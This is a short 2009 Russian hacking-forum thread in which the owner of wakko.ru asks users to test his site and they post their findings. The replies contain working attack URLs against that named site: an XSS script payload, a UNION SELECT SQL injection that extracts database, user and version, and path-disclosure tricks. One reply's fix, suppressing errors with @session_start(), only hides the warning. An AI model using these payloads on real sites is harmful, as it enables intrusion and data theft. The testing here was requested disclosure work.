Форум АНТИЧАТ - Маленький проект проверьте

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Маленький проект проверьте (https://forum.antichat.xyz/showthread.php?t=156172)

Wakko

13.11.2009 05:09

Маленький проект проверьте

Проверьте пожалуйста http://wakko.ru/
Гостевую, регистрацию и востановление пароля.
Спасибо.

[NiGHT]DarkAngel

13.11.2009 15:53

Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1

Не особо страшно, но все же не фильтруется

Раскрытие путей при подмене сессии:

Код:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /путь/index.php on line 3

Подмена заголовков,поле User-Agent

Wakko

13.11.2009 21:51

Цитата:

Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1

Исправил. Спасибо.

Цитата:

Раскрытие путей при подмене сессии:

А как избавлиться т этого можно?

AKYLA

07.12.2009 03:28

XSS
http://wakko.ru/?do=members&orderby=1<script>alert(12345)</script>

ILYAtirtir

07.12.2009 05:29

SQL inj

Цитата:

http://wakko.ru/index.php?do=profile&name=administratorrrr'+union+ select+1,concat_ws(0x3a,database(),user(),version( )),3,4,5,6,7,8,9,10,11,12--+

раскрытие путей

Цитата:

http://wakko.ru/index.php?do=profile&name[]=administrator

b3	07.12.2009 07:32

Цитата:

Сообщение от Wakko

А как избавлиться т этого можно?

Поставить собачку перед сессион_старт в 3й строке.

PHP код:


		
			
@session_start();

Время: 06:58